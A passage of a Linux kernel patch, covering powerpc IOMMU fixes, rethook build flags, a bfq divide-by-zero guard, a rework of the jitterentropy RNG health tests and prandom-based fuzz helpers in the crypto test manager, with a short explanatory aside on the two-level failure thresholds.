+ 		dev_err(dev, "Warning: IOMMU dma not supported: mask 0x%08llx, table unavailable\n", mask);
+ 		return 0;
+diff --git a/arch/powerpc/kernel/iommu.c b/arch/powerpc/kernel/iommu.c
+index ee95937bdaf14..b8b7a189cd3ce 100644
+--- a/arch/powerpc/kernel/iommu.c
++++ b/arch/powerpc/kernel/iommu.c
+@@ -517,7 +517,7 @@ int ppc_iommu_map_sg(struct device *dev, struct iommu_table *tbl,
+ 		/* Convert entry to a dma_addr_t */
+ 		entry += tbl->it_offset;
+ 		dma_addr = entry << tbl->it_page_shift;
+-		dma_addr |= (s->offset & ~IOMMU_PAGE_MASK(tbl));
++		dma_addr |= (vaddr & ~IOMMU_PAGE_MASK(tbl));
+ 
+ 		DBG("  - %lu pages, entry: %lx, dma_addr: %lx\n",
+ 			    npages, entry, dma_addr);
+@@ -904,6 +904,7 @@ void *iommu_alloc_coherent(struct device *dev, struct iommu_table *tbl,
+ 	unsigned int order;
+ 	unsigned int nio_pages, io_order;
+ 	struct page *page;
++	int tcesize = (1 << tbl->it_page_shift);
+ 
+ 	size = PAGE_ALIGN(size);
+ 	order = get_order(size);
+@@ -930,7 +931,8 @@ void *iommu_alloc_coherent(struct device *dev, struct iommu_table *tbl,
+ 	memset(ret, 0, size);
+ 
+ 	/* Set up tces to cover the allocated range */
+-	nio_pages = size >> tbl->it_page_shift;
++	nio_pages = IOMMU_PAGE_ALIGN(size, tbl) >> tbl->it_page_shift;
++
+ 	io_order = get_iommu_order(size, tbl);
+ 	mapping = iommu_alloc(dev, tbl, ret, nio_pages, DMA_BIDIRECTIONAL,
+ 			      mask >> tbl->it_page_shift, io_order, 0);
+@@ -938,7 +940,8 @@ void *iommu_alloc_coherent(struct device *dev, struct iommu_table *tbl,
+ 		free_pages((unsigned long)ret, order);
+ 		return NULL;
+ 	}
+-	*dma_handle = mapping;
++
++	*dma_handle = mapping | ((u64)ret & (tcesize - 1));
+ 	return ret;
+ }
+ 
+@@ -949,7 +952,7 @@ void iommu_free_coherent(struct iommu_table *tbl, size_t size,
+ 		unsigned int nio_pages;
+ 
+ 		size = PAGE_ALIGN(size);
+-		nio_pages = size >> tbl->it_page_shift;
++		nio_pages = IOMMU_PAGE_ALIGN(size, tbl) >> tbl->it_page_shift;
+ 		iommu_free(tbl, dma_handle, nio_pages);
+ 		size = PAGE_ALIGN(size);
+ 		free_pages((unsigned long)vaddr, get_order(size));
+diff --git a/arch/powerpc/mm/book3s64/radix_pgtable.c b/arch/powerpc/mm/book3s64/radix_pgtable.c
+index 26245aaf12b8b..2297aa764ecdb 100644
+--- a/arch/powerpc/mm/book3s64/radix_pgtable.c
++++ b/arch/powerpc/mm/book3s64/radix_pgtable.c
+@@ -1040,8 +1040,8 @@ void radix__ptep_set_access_flags(struct vm_area_struct *vma, pte_t *ptep,
+ 				  pte_t entry, unsigned long address, int psize)
+ {
+ 	struct mm_struct *mm = vma->vm_mm;
+-	unsigned long set = pte_val(entry) & (_PAGE_DIRTY | _PAGE_ACCESSED |
+-					      _PAGE_RW | _PAGE_EXEC);
++	unsigned long set = pte_val(entry) & (_PAGE_DIRTY | _PAGE_SOFT_DIRTY |
++					      _PAGE_ACCESSED | _PAGE_RW | _PAGE_EXEC);
+ 
+ 	unsigned long change = pte_val(entry) ^ pte_val(*ptep);
+ 	/*
+diff --git a/arch/powerpc/platforms/pseries/iommu.c b/arch/powerpc/platforms/pseries/iommu.c
+index 561adac690229..efba867017e22 100644
+--- a/arch/powerpc/platforms/pseries/iommu.c
++++ b/arch/powerpc/platforms/pseries/iommu.c
+@@ -85,19 +85,24 @@ static struct iommu_table_group *iommu_pseries_alloc_group(int node)
+ static void iommu_pseries_free_group(struct iommu_table_group *table_group,
+ 		const char *node_name)
+ {
+-	struct iommu_table *tbl;
+-
+ 	if (!table_group)
+ 		return;
+ 
+-	tbl = table_group->tables[0];
+ #ifdef CONFIG_IOMMU_API
+ 	if (table_group->group) {
+ 		iommu_group_put(table_group->group);
+ 		BUG_ON(table_group->group);
+ 	}
+ #endif
+-	iommu_tce_table_put(tbl);
++
++	/* Default DMA window table is at index 0, while DDW at 1. SR-IOV
++	 * adapters only have table on index 1.
++	 */
++	if (table_group->tables[0])
++		iommu_tce_table_put(table_group->tables[0]);
++
++	if (table_group->tables[1])
++		iommu_tce_table_put(table_group->tables[1]);
+ 
+ 	kfree(table_group);
+ }
+diff --git a/arch/riscv/kernel/probes/Makefile b/arch/riscv/kernel/probes/Makefile
+index 7f0840dcc31bc..90dea3abdbb22 100644
+--- a/arch/riscv/kernel/probes/Makefile
++++ b/arch/riscv/kernel/probes/Makefile
+@@ -4,3 +4,5 @@ obj-$(CONFIG_KPROBES)		+= kprobes_trampoline.o
+ obj-$(CONFIG_KPROBES_ON_FTRACE)	+= ftrace.o
+ obj-$(CONFIG_UPROBES)		+= uprobes.o decode-insn.o simulate-insn.o
+ CFLAGS_REMOVE_simulate-insn.o = $(CC_FLAGS_FTRACE)
++CFLAGS_REMOVE_rethook.o = $(CC_FLAGS_FTRACE)
++CFLAGS_REMOVE_rethook_trampoline.o = $(CC_FLAGS_FTRACE)
+diff --git a/arch/s390/crypto/chacha-glue.c b/arch/s390/crypto/chacha-glue.c
+index 7752bd314558e..5fae187f947a0 100644
+--- a/arch/s390/crypto/chacha-glue.c
++++ b/arch/s390/crypto/chacha-glue.c
+@@ -82,7 +82,7 @@ void chacha_crypt_arch(u32 *state, u8 *dst, const u8 *src,
+ 	 * it cannot handle a block of data or less, but otherwise
+ 	 * it can handle data of arbitrary size
+ 	 */
+-	if (bytes <= CHACHA_BLOCK_SIZE || nrounds != 20)
++	if (bytes <= CHACHA_BLOCK_SIZE || nrounds != 20 || !MACHINE_HAS_VX)
+ 		chacha_crypt_generic(state, dst, src, bytes, nrounds);
+ 	else
+ 		chacha20_crypt_s390(state, dst, src, bytes,
+diff --git a/arch/s390/kernel/Makefile b/arch/s390/kernel/Makefile
+index 5e6a23299790f..7d92aa57715ac 100644
+--- a/arch/s390/kernel/Makefile
++++ b/arch/s390/kernel/Makefile
+@@ -10,6 +10,7 @@ CFLAGS_REMOVE_ftrace.o		= $(CC_FLAGS_FTRACE)
+ 
+ # Do not trace early setup code
+ CFLAGS_REMOVE_early.o		= $(CC_FLAGS_FTRACE)
++CFLAGS_REMOVE_rethook.o		= $(CC_FLAGS_FTRACE)
+ 
+ endif
+ 
+diff --git a/arch/x86/kernel/Makefile b/arch/x86/kernel/Makefile
+index f901658d9f7c0..42b5540dac58d 100644
+--- a/arch/x86/kernel/Makefile
++++ b/arch/x86/kernel/Makefile
+@@ -17,6 +17,7 @@ CFLAGS_REMOVE_ftrace.o = -pg
+ CFLAGS_REMOVE_early_printk.o = -pg
+ CFLAGS_REMOVE_head64.o = -pg
+ CFLAGS_REMOVE_sev.o = -pg
++CFLAGS_REMOVE_rethook.o = -pg
+ endif
+ 
+ KASAN_SANITIZE_head$(BITS).o				:= n
+diff --git a/block/bfq-iosched.c b/block/bfq-iosched.c
+index ff9d238894157..52eb79d60a3f3 100644
+--- a/block/bfq-iosched.c
++++ b/block/bfq-iosched.c
+@@ -637,6 +637,8 @@ retry:
+ 					sched_data->service_tree[i].wsum;
+ 			}
+ 		}
++		if (!wsum)
++			continue;
+ 		limit = DIV_ROUND_CLOSEST(limit * entity->weight, wsum);
+ 		if (entity->allocated >= limit) {
+ 			bfq_log_bfqq(bfqq->bfqd, bfqq,
+diff --git a/crypto/jitterentropy-kcapi.c b/crypto/jitterentropy-kcapi.c
+index 2d115bec15aeb..b9edfaa51b273 100644
+--- a/crypto/jitterentropy-kcapi.c
++++ b/crypto/jitterentropy-kcapi.c
+@@ -37,6 +37,7 @@
+  * DAMAGE.
+  */
+ 
++#include <linux/fips.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/slab.h>
+@@ -59,11 +60,6 @@ void jent_zfree(void *ptr)
+ 	kfree_sensitive(ptr);
+ }
+ 
+-void jent_panic(char *s)
+-{
+-	panic("%s", s);
+-}
+-
+ void jent_memcpy(void *dest, const void *src, unsigned int n)
+ {
+ 	memcpy(dest, src, n);
+@@ -102,7 +98,6 @@ void jent_get_nstime(__u64 *out)
+ struct jitterentropy {
+ 	spinlock_t jent_lock;
+ 	struct rand_data *entropy_collector;
+-	unsigned int reset_cnt;
+ };
+ 
+ static int jent_kcapi_init(struct crypto_tfm *tfm)
+@@ -138,32 +133,30 @@ static int jent_kcapi_random(struct crypto_rng *tfm,
+ 
+ 	spin_lock(&rng->jent_lock);
+ 
+-	/* Return a permanent error in case we had too many resets in a row. */
+-	if (rng->reset_cnt > (1<<10)) {
+-		ret = -EFAULT;
+-		goto out;
+-	}
+-
+ 	ret = jent_read_entropy(rng->entropy_collector, rdata, dlen);
+ 
+-	/* Reset RNG in case of health failures */
+-	if (ret < -1) {
+-		pr_warn_ratelimited("Reset Jitter RNG due to health test failure: %s failure\n",
+-				    (ret == -2) ? "Repetition Count Test" :
+-						  "Adaptive Proportion Test");
+-
+-		rng->reset_cnt++;
+-
++	if (ret == -3) {
++		/* Handle permanent health test error */
++		/*
++		 * If the kernel was booted with fips=1, it implies that
++		 * the entire kernel acts as a FIPS 140 module. In this case
++		 * an SP800-90B permanent health test error is treated as
++		 * a FIPS module error.
++		 */
++		if (fips_enabled)
++			panic("Jitter RNG permanent health test failure\n");
++
++		pr_err("Jitter RNG permanent health test failure\n");
++		ret = -EFAULT;
++	} else if (ret == -2) {
++		/* Handle intermittent health test error */
++		pr_warn_ratelimited("Reset Jitter RNG due to intermittent health test failure\n");
+ 		ret = -EAGAIN;
+-	} else {
+-		rng->reset_cnt = 0;
+-
+-		/* Convert the Jitter RNG error into a usable error code */
+-		if (ret == -1)
+-			ret = -EINVAL;
++	} else if (ret == -1) {
++		/* Handle other errors */
++		ret = -EINVAL;
+ 	}
+ 
+-out:
+ 	spin_unlock(&rng->jent_lock);
+ 
+ 	return ret;
+@@ -197,6 +190,10 @@ static int __init jent_mod_init(void)
+ 
+ 	ret = jent_entropy_init();
+ 	if (ret) {
++		/* Handle permanent health test error */
++		if (fips_enabled)
++			panic("jitterentropy: Initialization failed with host not compliant with requirements: %d\n", ret);
++
+ 		pr_info("jitterentropy: Initialization failed with host not compliant with requirements: %d\n", ret);
+ 		return -EFAULT;
+ 	}
+diff --git a/crypto/jitterentropy.c b/crypto/jitterentropy.c
+index 93bff32138238..22f48bf4c6f57 100644
+--- a/crypto/jitterentropy.c
++++ b/crypto/jitterentropy.c
+@@ -85,10 +85,14 @@ struct rand_data {
+ 				      * bit generation */
+ 
+ 	/* Repetition Count Test */
+-	int rct_count;			/* Number of stuck values */
++	unsigned int rct_count;			/* Number of stuck values */
+ 
+-	/* Adaptive Proportion Test for a significance level of 2^-30 */
++	/* Intermittent health test failure threshold of 2^-30 */
++#define JENT_RCT_CUTOFF		30	/* Taken from SP800-90B sec 4.4.1 */
+ #define JENT_APT_CUTOFF		325	/* Taken from SP800-90B sec 4.4.2 */
++	/* Permanent health test failure threshold of 2^-60 */
++#define JENT_RCT_CUTOFF_PERMANENT	60
++#define JENT_APT_CUTOFF_PERMANENT	355
+ #define JENT_APT_WINDOW_SIZE	512	/* Data window size */
+ 	/* LSB of time stamp to process */
+ #define JENT_APT_LSB		16
+@@ -97,8 +101,6 @@ struct rand_data {
+ 	unsigned int apt_count;		/* APT counter */
+ 	unsigned int apt_base;		/* APT base reference */
+ 	unsigned int apt_base_set:1;	/* APT base reference set? */
+-
+-	unsigned int health_failure:1;	/* Permanent health failure */
+ };
+ 
+ /* Flags that can be used to initialize the RNG */
+@@ -169,19 +171,26 @@ static void jent_apt_insert(struct rand_data *ec, unsigned int delta_masked)
+ 		return;
+ 	}
+ 
+-	if (delta_masked == ec->apt_base) {
++	if (delta_masked == ec->apt_base)
+ 		ec->apt_count++;
+ 
+-		if (ec->apt_count >= JENT_APT_CUTOFF)
+-			ec->health_failure = 1;
+-	}
+-
+ 	ec->apt_observations++;
+ 
+ 	if (ec->apt_observations >= JENT_APT_WINDOW_SIZE)
+ 		jent_apt_reset(ec, delta_masked);
+ }
+ 
++/* APT health test failure detection */
++static int jent_apt_permanent_failure(struct rand_data *ec)
++{
++	return (ec->apt_count >= JENT_APT_CUTOFF_PERMANENT) ? 1 : 0;
++}
++
++static int jent_apt_failure(struct rand_data *ec)
++{
++	return (ec->apt_count >= JENT_APT_CUTOFF) ? 1 : 0;
++}
++
+ /***************************************************************************
+  * Stuck Test and its use as Repetition Count Test
+  *
+@@ -206,55 +215,14 @@ static void jent_apt_insert(struct rand_data *ec, unsigned int delta_masked)
+  */
+ static void jent_rct_insert(struct rand_data *ec, int stuck)
+ {
+-	/*
+-	 * If we have a count less than zero, a previous RCT round identified
+-	 * a failure. We will not overwrite it.
+-	 */
+-	if (ec->rct_count < 0)
+-		return;
+-
+ 	if (stuck) {
+ 		ec->rct_count++;
+-
+-		/*
+-		 * The cutoff value is based on the following consideration:
+-		 * alpha = 2^-30 as recommended in FIPS 140-2 IG 9.8.
+-		 * In addition, we require an entropy value H of 1/OSR as this
+-		 * is the minimum entropy required to provide full entropy.
+-		 * Note, we collect 64 * OSR deltas for inserting them into
+-		 * the entropy pool which should then have (close to) 64 bits
+-		 * of entropy.
+-		 *
+-		 * Note, ec->rct_count (which equals to value B in the pseudo
+-		 * code of SP800-90B section 4.4.1) starts with zero. Hence
+-		 * we need to subtract one from the cutoff value as calculated
+-		 * following SP800-90B.
+-		 */
+-		if ((unsigned int)ec->rct_count >= (31 * ec->osr)) {
+-			ec->rct_count = -1;
+-			ec->health_failure = 1;
+-		}
+ 	} else {
++		/* Reset RCT */
+ 		ec->rct_count = 0;
+ 	}
+ }
+ 
+-/*
+- * Is there an RCT health test failure?
+- *
+- * @ec [in] Reference to entropy collector
+- *
+- * @return
+- * 	0 No health test failure
+- * 	1 Permanent health test failure
+- */
+-static int jent_rct_failure(struct rand_data *ec)
+-{
+-	if (ec->rct_count < 0)
+-		return 1;
+-	return 0;
+-}
+-
+ static inline __u64 jent_delta(__u64 prev, __u64 next)
+ {
+ #define JENT_UINT64_MAX		(__u64)(~((__u64) 0))
+@@ -303,18 +271,26 @@ static int jent_stuck(struct rand_data *ec, __u64 current_delta)
+ 	return 0;
+ }
+ 
+-/*
+- * Report any health test failures
+- *
+- * @ec [in] Reference to entropy collector
+- *
+- * @return
+- * 	0 No health test failure
+- * 	1 Permanent health test failure
+- */
++/* RCT health test failure detection */
++static int jent_rct_permanent_failure(struct rand_data *ec)
++{
++	return (ec->rct_count >= JENT_RCT_CUTOFF_PERMANENT) ? 1 : 0;
++}
++
++static int jent_rct_failure(struct rand_data *ec)
++{
++	return (ec->rct_count >= JENT_RCT_CUTOFF) ? 1 : 0;
++}
++
++/* Report of health test failures */
+ static int jent_health_failure(struct rand_data *ec)
+ {
+-	return ec->health_failure;
++	return jent_rct_failure(ec) | jent_apt_failure(ec);
++}
++
++static int jent_permanent_health_failure(struct rand_data *ec)
++{
++	return jent_rct_permanent_failure(ec) | jent_apt_permanent_failure(ec);
+ }
+ 
+ /***************************************************************************
+@@ -600,8 +576,8 @@ static void jent_gen_entropy(struct rand_data *ec)
+  *
+  * The following error codes can occur:
+  *	-1	entropy_collector is NULL
+- *	-2	RCT failed
+- *	-3	APT test failed
++ *	-2	Intermittent health failure
++ *	-3	Permanent health failure
+  */
+ int jent_read_entropy(struct rand_data *ec, unsigned char *data,
+ 		      unsigned int len)
+@@ -616,39 +592,23 @@ int jent_read_entropy(struct rand_data *ec, unsigned char *data,
+ 
+ 		jent_gen_entropy(ec);
+ 
+-		if (jent_health_failure(ec)) {
+-			int ret;
+-
+-			if (jent_rct_failure(ec))
+-				ret = -2;
+-			else
+-				ret = -3;
+-
++		if (jent_permanent_health_failure(ec)) {
+ 			/*
+-			 * Re-initialize the noise source
+-			 *
+-			 * If the health test fails, the Jitter RNG remains
+-			 * in failure state and will return a health failure
+-			 * during next invocation.
++			 * At this point, the Jitter RNG instance is considered
++			 * as a failed instance. There is no rerun of the
++			 * startup test any more, because the caller
++			 * is assumed to not further use this instance.
+ 			 */
+-			if (jent_entropy_init())
+-				return ret;
+-
+-			/* Set APT to initial state */
+-			jent_apt_reset(ec, 0);
+-			ec->apt_base_set = 0;
+-
+-			/* Set RCT to initial state */
+-			ec->rct_count = 0;
+-
+-			/* Re-enable Jitter RNG */
+-			ec->health_failure = 0;
+-
++			return -3;
++		} else if (jent_health_failure(ec)) {
+ 			/*
+-			 * Return the health test failure status to the
+-			 * caller as the generated value is not appropriate.
++			 * Perform startup health tests and return permanent
++			 * error if it fails.
+ 			 */
+-			return ret;
++			if (jent_entropy_init())
++				return -3;
++
++			return -2;
+ 		}
+ 
+ 		if ((DATA_SIZE_BITS / 8) < len)
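
The rework above replaces the old sticky failure flag with a single counter checked against two cutoffs: crossing the 2^-30 bound is an intermittent failure (-2, the startup tests rerun), crossing the 2^-60 bound is permanent (-3, the instance is abandoned). A standalone sketch of the two-level scheme, with the RCT thresholds taken from the hunk:

	#include <stdio.h>

	#define RCT_CUTOFF		30	/* intermittent, 2^-30 */
	#define RCT_CUTOFF_PERMANENT	60	/* permanent, 2^-60 */

	static int rct_status(unsigned int rct_count)
	{
		if (rct_count >= RCT_CUTOFF_PERMANENT)
			return -3;	/* permanent health failure */
		if (rct_count >= RCT_CUTOFF)
			return -2;	/* intermittent health failure */
		return 0;
	}

	int main(void)
	{
		printf("%d %d %d\n", rct_status(5), rct_status(31), rct_status(61));
		return 0;
	}
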
+diff --git a/crypto/jitterentropy.h b/crypto/jitterentropy.h
+index b7397b617ef05..5cc583f6bc6b8 100644
+--- a/crypto/jitterentropy.h
++++ b/crypto/jitterentropy.h
+@@ -2,7 +2,6 @@
+ 
+ extern void *jent_zalloc(unsigned int len);
+ extern void jent_zfree(void *ptr);
+-extern void jent_panic(char *s);
+ extern void jent_memcpy(void *dest, const void *src, unsigned int n);
+ extern void jent_get_nstime(__u64 *out);
+ 
+diff --git a/crypto/testmgr.c b/crypto/testmgr.c
+index 814d2dc87d7e8..56c39a0c94952 100644
+--- a/crypto/testmgr.c
++++ b/crypto/testmgr.c
+@@ -852,12 +852,50 @@ static int prepare_keybuf(const u8 *key, unsigned int ksize,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 
++/*
++ * The fuzz tests use prandom instead of the normal Linux RNG since they don't
++ * need cryptographically secure random numbers.  This greatly improves the
++ * performance of these tests, especially if they are run before the Linux RNG
++ * has been initialized or if they are run on a lockdep-enabled kernel.
++ */
++
++static inline void init_rnd_state(struct rnd_state *rng)
++{
++	prandom_seed_state(rng, get_random_u64());
++}
++
++static inline u8 prandom_u8(struct rnd_state *rng)
++{
++	return prandom_u32_state(rng);
++}
++
++static inline u32 prandom_u32_below(struct rnd_state *rng, u32 ceil)
++{
++	/*
++	 * This is slightly biased for non-power-of-2 values of 'ceil', but this
++	 * isn't important here.
++	 */
++	return prandom_u32_state(rng) % ceil;
++}
++
++static inline bool prandom_bool(struct rnd_state *rng)
++{
++	return prandom_u32_below(rng, 2);
++}
++
++static inline u32 prandom_u32_inclusive(struct rnd_state *rng,
++					u32 floor, u32 ceil)
++{
++	return floor + prandom_u32_below(rng, ceil - floor + 1);
++}
++
+ /* Generate a random length in range [0, max_len], but prefer smaller values */
+-static unsigned int generate_random_length(unsigned int max_len)
++static unsigned int generate_random_length(struct rnd_state *rng,
++					   unsigned int max_len)
+ {
+-	unsigned int len = prandom_u32_max(max_len + 1);
++	unsigned int len = prandom_u32_below(rng, max_len + 1);
+ 
+-	switch (prandom_u32_max(4)) {
++	switch (prandom_u32_below(rng, 4)) {
+ 	case 0:
+ 		return len % 64;
+ 	case 1:
+@@ -870,43 +908,44 @@ static unsigned int generate_random_length(unsigned int max_len)
+ }
+ 
+ /* Flip a random bit in the given nonempty data buffer */
+-static void flip_random_bit(u8 *buf, size_t size)
++static void flip_random_bit(struct rnd_state *rng, u8 *buf, size_t size)
+ {
+ 	size_t bitpos;
+ 
+-	bitpos = prandom_u32_max(size * 8);
++	bitpos = prandom_u32_below(rng, size * 8);
+ 	buf[bitpos / 8] ^= 1 << (bitpos % 8);
+ }
+ 
+ /* Flip a random byte in the given nonempty data buffer */
+-static void flip_random_byte(u8 *buf, size_t size)
++static void flip_random_byte(struct rnd_state *rng, u8 *buf, size_t size)
+ {
+-	buf[prandom_u32_max(size)] ^= 0xff;
++	buf[prandom_u32_below(rng, size)] ^= 0xff;
+ }
+ 
+ /* Sometimes make some random changes to the given nonempty data buffer */
+-static void mutate_buffer(u8 *buf, size_t size)
++static void mutate_buffer(struct rnd_state *rng, u8 *buf, size_t size)
+ {
+ 	size_t num_flips;
+ 	size_t i;
+ 
+ 	/* Sometimes flip some bits */
+-	if (prandom_u32_max(4) == 0) {
+-		num_flips = min_t(size_t, 1 << prandom_u32_max(8), size * 8);
++	if (prandom_u32_below(rng, 4) == 0) {
++		num_flips = min_t(size_t, 1 << prandom_u32_below(rng, 8),
++				  size * 8);
+ 		for (i = 0; i < num_flips; i++)
+-			flip_random_bit(buf, size);
++			flip_random_bit(rng, buf, size);
+ 	}
+ 
+ 	/* Sometimes flip some bytes */
+-	if (prandom_u32_max(4) == 0) {
+-		num_flips = min_t(size_t, 1 << prandom_u32_max(8), size);
++	if (prandom_u32_below(rng, 4) == 0) {
++		num_flips = min_t(size_t, 1 << prandom_u32_below(rng, 8), size);
+ 		for (i = 0; i < num_flips; i++)
+-			flip_random_byte(buf, size);
++			flip_random_byte(rng, buf, size);
+ 	}
+ }
+ 
+ /* Randomly generate 'count' bytes, but sometimes make them "interesting" */
+-static void generate_random_bytes(u8 *buf, size_t count)
++static void generate_random_bytes(struct rnd_state *rng, u8 *buf, size_t count)
+ {
+ 	u8 b;
+ 	u8 increment;
+@@ -915,11 +954,11 @@ static void generate_random_bytes(u8 *buf, size_t count)
+ 	if (count == 0)
+ 		return;
+ 
+-	switch (prandom_u32_max(8)) { /* Choose a generation strategy */
++	switch (prandom_u32_below(rng, 8)) { /* Choose a generation strategy */
+ 	case 0:
+ 	case 1:
+ 		/* All the same byte, plus optional mutations */
+-		switch (prandom_u32_max(4)) {
++		switch (prandom_u32_below(rng, 4)) {
+ 		case 0:
+ 			b = 0x00;
+ 			break;
+@@ -927,28 +966,28 @@ static void generate_random_bytes(u8 *buf, size_t count)
+ 			b = 0xff;
+ 			break;
+ 		default:
+-			b = get_random_u8();
++			b = prandom_u8(rng);
+ 			break;
+ 		}
+ 		memset(buf, b, count);
+-		mutate_buffer(buf, count);
++		mutate_buffer(rng, buf, count);
+ 		break;
+ 	case 2:
+ 		/* Ascending or descending bytes, plus optional mutations */
+-		increment = get_random_u8();
+-		b = get_random_u8();
++		increment = prandom_u8(rng);
++		b = prandom_u8(rng);
+ 		for (i = 0; i < count; i++, b += increment)
+ 			buf[i] = b;
+-		mutate_buffer(buf, count);
++		mutate_buffer(rng, buf, count);
+ 		break;
+ 	default:
+ 		/* Fully random bytes */
+-		for (i = 0; i < count; i++)
+-			buf[i] = get_random_u8();
++		prandom_bytes_state(rng, buf, count);
+ 	}
+ }
+ 
+-static char *generate_random_sgl_divisions(struct test_sg_division *divs,
++static char *generate_random_sgl_divisions(struct rnd_state *rng,
++					   struct test_sg_division *divs,
+ 					   size_t max_divs, char *p, char *end,
+ 					   bool gen_flushes, u32 req_flags)
+ {
+@@ -959,24 +998,26 @@ static char *generate_random_sgl_divisions(struct test_sg_division *divs,
+ 		unsigned int this_len;
+ 		const char *flushtype_str;
+ 
+-		if (div == &divs[max_divs - 1] || prandom_u32_max(2) == 0)
++		if (div == &divs[max_divs - 1] || prandom_bool(rng))
+ 			this_len = remaining;
+ 		else
+-			this_len = 1 + prandom_u32_max(remaining);
++			this_len = prandom_u32_inclusive(rng, 1, remaining);
+ 		div->proportion_of_total = this_len;
+ 
+-		if (prandom_u32_max(4) == 0)
+-			div->offset = (PAGE_SIZE - 128) + prandom_u32_max(128);
+-		else if (prandom_u32_max(2) == 0)
+-			div->offset = prandom_u32_max(32);
++		if (prandom_u32_below(rng, 4) == 0)
++			div->offset = prandom_u32_inclusive(rng,
++							    PAGE_SIZE - 128,
++							    PAGE_SIZE - 1);
++		else if (prandom_bool(rng))
++			div->offset = prandom_u32_below(rng, 32);
+ 		else
+-			div->offset = prandom_u32_max(PAGE_SIZE);
+-		if (prandom_u32_max(8) == 0)
++			div->offset = prandom_u32_below(rng, PAGE_SIZE);
++		if (prandom_u32_below(rng, 8) == 0)
+ 			div->offset_relative_to_alignmask = true;
+ 
+ 		div->flush_type = FLUSH_TYPE_NONE;
+ 		if (gen_flushes) {
+-			switch (prandom_u32_max(4)) {
++			switch (prandom_u32_below(rng, 4)) {
+ 			case 0:
+ 				div->flush_type = FLUSH_TYPE_REIMPORT;
+ 				break;
+@@ -988,7 +1029,7 @@ static char *generate_random_sgl_divisions(struct test_sg_division *divs,
+ 
+ 		if (div->flush_type != FLUSH_TYPE_NONE &&
+ 		    !(req_flags & CRYPTO_TFM_REQ_MAY_SLEEP) &&
+-		    prandom_u32_max(2) == 0)
++		    prandom_bool(rng))
+ 			div->nosimd = true;
+ 
+ 		switch (div->flush_type) {
+@@ -1023,7 +1064,8 @@ static char *generate_random_sgl_divisions(struct test_sg_division *divs,
+ }
+ 
+ /* Generate a random testvec_config for fuzz testing */
+-static void generate_random_testvec_config(struct testvec_config *cfg,
++static void generate_random_testvec_config(struct rnd_state *rng,
++					   struct testvec_config *cfg,
+ 					   char *name, size_t max_namelen)
+ {
+ 	char *p = name;
+@@ -1035,7 +1077,7 @@ static void generate_random_testvec_config(struct testvec_config *cfg,
+ 
+ 	p += scnprintf(p, end - p, "random:");
+ 
+-	switch (prandom_u32_max(4)) {
++	switch (prandom_u32_below(rng, 4)) {
+ 	case 0:
+ 	case 1:
+ 		cfg->inplace_mode = OUT_OF_PLACE;
+@@ -1050,12 +1092,12 @@ static void generate_random_testvec_config(struct testvec_config *cfg,
+ 		break;
+ 	}
+ 
+-	if (prandom_u32_max(2) == 0) {
++	if (prandom_bool(rng)) {
+ 		cfg->req_flags |= CRYPTO_TFM_REQ_MAY_SLEEP;
+ 		p += scnprintf(p, end - p, " may_sleep");
+ 	}
+ 
+-	switch (prandom_u32_max(4)) {
++	switch (prandom_u32_below(rng, 4)) {
+ 	case 0:
+ 		cfg->finalization_type = FINALIZATION_TYPE_FINAL;
+ 		p += scnprintf(p, end - p, " use_final");
+@@ -1070,36 +1112,37 @@ static void generate_random_testvec_config(struct testvec_config *cfg,
+ 		break;
+ 	}
+ 
+-	if (!(cfg->req_flags & CRYPTO_TFM_REQ_MAY_SLEEP) &&
+-	    prandom_u32_max(2) == 0) {
++	if (!(cfg->req_flags & CRYPTO_TFM_REQ_MAY_SLEEP) && prandom_bool(rng)) {
+ 		cfg->nosimd = true;
+ 		p += scnprintf(p, end - p, " nosimd");
+ 	}
+ 
+ 	p += scnprintf(p, end - p, " src_divs=[");
+-	p = generate_random_sgl_divisions(cfg->src_divs,
++	p = generate_random_sgl_divisions(rng, cfg->src_divs,
+ 					  ARRAY_SIZE(cfg->src_divs), p, end,
+ 					  (cfg->finalization_type !=
+ 					   FINALIZATION_TYPE_DIGEST),
+ 					  cfg->req_flags);
+ 	p += scnprintf(p, end - p, "]");
+ 
+-	if (cfg->inplace_mode == OUT_OF_PLACE && prandom_u32_max(2) == 0) {
++	if (cfg->inplace_mode == OUT_OF_PLACE && prandom_bool(rng)) {
+ 		p += scnprintf(p, end - p, " dst_divs=[");
+-		p = generate_random_sgl_divisions(cfg->dst_divs,
++		p = generate_random_sgl_divisions(rng, cfg->dst_divs,
+ 						  ARRAY_SIZE(cfg->dst_divs),
+ 						  p, end, false,
+ 						  cfg->req_flags);
+ 		p += scnprintf(p, end - p, "]");
+ 	}
+ 
+-	if (prandom_u32_max(2) == 0) {
+-		cfg->iv_offset = 1 + prandom_u32_max(MAX_ALGAPI_ALIGNMASK);
++	if (prandom_bool(rng)) {
++		cfg->iv_offset = prandom_u32_inclusive(rng, 1,
++						       MAX_ALGAPI_ALIGNMASK);
+ 		p += scnprintf(p, end - p, " iv_offset=%u", cfg->iv_offset);
+ 	}
+ 
+-	if (prandom_u32_max(2) == 0) {
+-		cfg->key_offset = 1 + prandom_u32_max(MAX_ALGAPI_ALIGNMASK);
++	if (prandom_bool(rng)) {
++		cfg->key_offset = prandom_u32_inclusive(rng, 1,
++							MAX_ALGAPI_ALIGNMASK);
+ 		p += scnprintf(p, end - p, " key_offset=%u", cfg->key_offset);
+ 	}
+ 
+@@ -1612,11 +1655,14 @@ static int test_hash_vec(const struct hash_testvec *vec, unsigned int vec_num,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 	if (!noextratests) {
++		struct rnd_state rng;
+ 		struct testvec_config cfg;
+ 		char cfgname[TESTVEC_CONFIG_NAMELEN];
+ 
++		init_rnd_state(&rng);
++
+ 		for (i = 0; i < fuzz_iterations; i++) {
+-			generate_random_testvec_config(&cfg, cfgname,
++			generate_random_testvec_config(&rng, &cfg, cfgname,
+ 						       sizeof(cfgname));
+ 			err = test_hash_vec_cfg(vec, vec_name, &cfg,
+ 						req, desc, tsgl, hashstate);
+@@ -1634,15 +1680,16 @@ static int test_hash_vec(const struct hash_testvec *vec, unsigned int vec_num,
+  * Generate a hash test vector from the given implementation.
+  * Assumes the buffers in 'vec' were already allocated.
+  */
+-static void generate_random_hash_testvec(struct shash_desc *desc,
++static void generate_random_hash_testvec(struct rnd_state *rng,
++					 struct shash_desc *desc,
+ 					 struct hash_testvec *vec,
+ 					 unsigned int maxkeysize,
+ 					 unsigned int maxdatasize,
+ 					 char *name, size_t max_namelen)
+ {
